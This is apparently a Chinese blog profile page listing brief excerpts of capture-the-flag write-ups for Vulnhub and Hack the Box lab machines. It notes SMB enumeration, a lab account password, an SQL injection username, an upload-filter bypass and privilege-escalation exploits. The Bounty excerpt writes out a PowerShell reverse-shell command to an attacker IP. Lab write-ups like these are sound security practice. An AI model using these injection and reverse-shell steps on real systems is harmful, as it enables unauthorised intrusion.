- 博客(9)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 Vulnhub靶机 Tr0ll2
80什么也没找到ftp倒是登录成功了下载文件需要密码去看看之前看到的图片以为是密码结果是网页速度好快啊直接密码就出来了完了缓冲区溢出我不会啊我不会我不想做缓冲区溢出的题...
2020-06-09 16:30:27
585
1原创 Hack the box靶机 Bastion
还差四个靶机然后就准备去练oscp的lab了加油开了ssh还有smb先扫描smb发现Backups下面有一个note.txt下载下来查看系统管理员:请不要在本地传输整个备份文件,VPN到分公司的速度太慢。在mnt下创建Backups文件夹挂载可以直接访问smb的文件就是有点慢.VHD文件相当于硬盘挂载它访问.config文件发现账号和哈希值L4mpje:bureaulampjessh登录...
2020-06-04 13:12:31
417
原创 Hack the box靶机 SecNotes
注册了一个admin‘ or ‘1’='1的用户登录发现一个账户看见bash.lnk可以查看root.txt也可以像下面这样完成好几天没学习了因为有点心烦特别爱的女孩突然就走了我知道错了也知道怎么改可是根本没有机会改了特别难受只能学习了因为我怕我闲下来了就疯狂的想她我真害怕我弄丢他还是丢了其实闲不闲下来还是一直在想真他妈的烦...
2020-06-03 21:21:26
258
原创 Hack the box靶机 Bounty
两个页面都是没有权限不能访问但是也没有扫出来登录页面投个图他们换了本字典我懒得扫了有过滤上传了一个shell.php.gif绕过了找到一篇博客上传.config使用nishang的Invoke-PowerShellTcp.ps1的时候需要在这个文件末尾加入调用Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443然后就可以连接了没有补丁那ms15-051完成...
2020-06-03 18:51:20
483
原创 Hack the box靶机 Soli
突破口是oracle就是真的慢我快吐了scott/tiger不知道为什么老是连接不上给我整不会了但是我重启了一下换了一个端口然后就好了
2020-06-03 17:13:53
173
原创 Hack the box靶机 Arctic
找到后台登录地址coldfusion 8搜索漏洞找到可以上传的地方需要payload使用MS10-059https://github.com/Re4son/Chimichurri完成
2020-06-03 13:08:34
393
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人